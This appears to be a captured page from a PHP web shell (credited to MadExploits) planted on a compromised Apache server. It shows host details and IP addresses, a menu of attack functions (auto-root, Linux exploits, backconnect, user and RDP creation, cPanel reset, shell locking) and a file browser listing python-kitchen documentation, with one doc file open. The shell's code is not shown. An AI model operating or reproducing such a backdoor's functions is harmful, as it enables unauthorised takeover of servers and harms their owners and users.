Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.15.225.177
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-kitchen-1.1.1 /
html /
_sources /
[ HOME SHELL ]
Name
Size
Permission
Action
api-collections.txt
122
B
-rw-r--r--
api-exceptions.txt
250
B
-rw-r--r--
api-i18n.txt
1
KB
-rw-r--r--
api-iterutils.txt
203
B
-rw-r--r--
api-overview.txt
520
B
-rw-r--r--
api-pycompat24.txt
1.02
KB
-rw-r--r--
api-pycompat25.txt
173
B
-rw-r--r--
api-pycompat27.txt
1.12
KB
-rw-r--r--
api-text-converters.txt
18.26
KB
-rw-r--r--
api-text-display.txt
912
B
-rw-r--r--
api-text-misc.txt
48
B
-rw-r--r--
api-text-utf8.txt
65
B
-rw-r--r--
api-text.txt
707
B
-rw-r--r--
api-versioning.txt
146
B
-rw-r--r--
designing-unicode-apis.txt
30.6
KB
-rw-r--r--
glossary.txt
4.21
KB
-rw-r--r--
hacking.txt
13.22
KB
-rw-r--r--
index.txt
5.77
KB
-rw-r--r--
porting-guide-0.3.txt
9.26
KB
-rw-r--r--
tutorial.txt
828
B
-rw-r--r--
unicode-frustrations.txt
26.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api-pycompat24.txt
======================= Python 2.4 Compatibiity ======================= ------------------- Sets for python-2.3 ------------------- .. automodule:: kitchen.pycompat24.sets .. autofunction:: kitchen.pycompat24.sets.add_builtin_set ---------------------------------- Partial new style base64 interface ---------------------------------- .. automodule:: kitchen.pycompat24.base64 :members: ---------- Subprocess ---------- .. seealso:: :mod:`kitchen.pycompat27.subprocess` Kitchen includes the python-2.7 version of subprocess which has a new function, :func:`~kitchen.pycompat27.subprocess.check_output`. When you import :mod:`pycompat24.subprocess` you will be getting the python-2.7 version of subprocess rather than the 2.4 version (where subprocess first appeared). This choice was made so that we can concentrate our efforts on keeping the single version of subprocess up to date rather than working on a 2.4 version that very few people would need specifically.
Close